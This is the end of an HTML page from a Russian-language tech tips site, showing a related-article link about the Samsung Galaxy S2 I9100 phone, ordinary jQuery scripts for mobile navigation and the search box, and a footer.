<div class="zergentity"> <a href="/tips/i9100-razmery-telefon-samsung-galaxy-s2-i9100-harakteristiki-sravnenie-s/" class="zergimg"> <img src="/uploads/def63dc3ea1bfd243bb420ea50b229dc.jpg" nopin="true" data-pin-no-hover="true" loading=lazy> </a> <div class="zergheadline"> <a href="/tips/i9100-razmery-telefon-samsung-galaxy-s2-i9100-harakteristiki-sravnenie-s/" >Телефон Samsung Galaxy S2 I9100: характеристики, сравнение с конкурентами и отзывы</a> </div> </div> </div> </div> </div> </div> <div class="tripelift-container"> </div> </div> <aside id="sidebar" style='top:90px!important;;left:70%!important;'> </aside> </div> </main> <script src="/assets/nav.js"></script> <script> jQuery(document).ready(function() { var isTablet = jQuery("#is-tablet").is(":visible"); var isMobile = jQuery("#is-mobile").is(":visible"); if (isMobile || isTablet || jQuery(".nav-opener:visible").length > 0) { initMobileNav(); } }); </script> <script> jQuery("#search-btn").click(function() { jQuery(".search-box").addClass("searching").width( jQuery("#header .nav-holder").width() - jQuery("#social-nav").width() ); setTimeout(function() { jQuery(".search-box input").width( jQuery("#header .nav-holder").width() - jQuery("#social-nav").width() - 150 ).focus(); }, 600); }); jQuery("#search-close").click(function() { jQuery(".search-box").removeClass("searching").css({ width: "" }) }); </script> <footer id="footer"> <div class="mobile-ad-placeholder footer-ad" data-ad-height="any" data-ad-width="any" data-ad-pos="footer"></div> <div class="holder"> <div id="footer-bottom"> <p><a href="/feedback/">Контакты</a></p> <p>© 2024 / Все права защищены</p> <img src="/public/logo.svg?1" alt="Интернет. Программы. Настройки. Безопасность. Гаджеты" loading=lazy> </div> </div> </footer> </div> </div> </body> </html>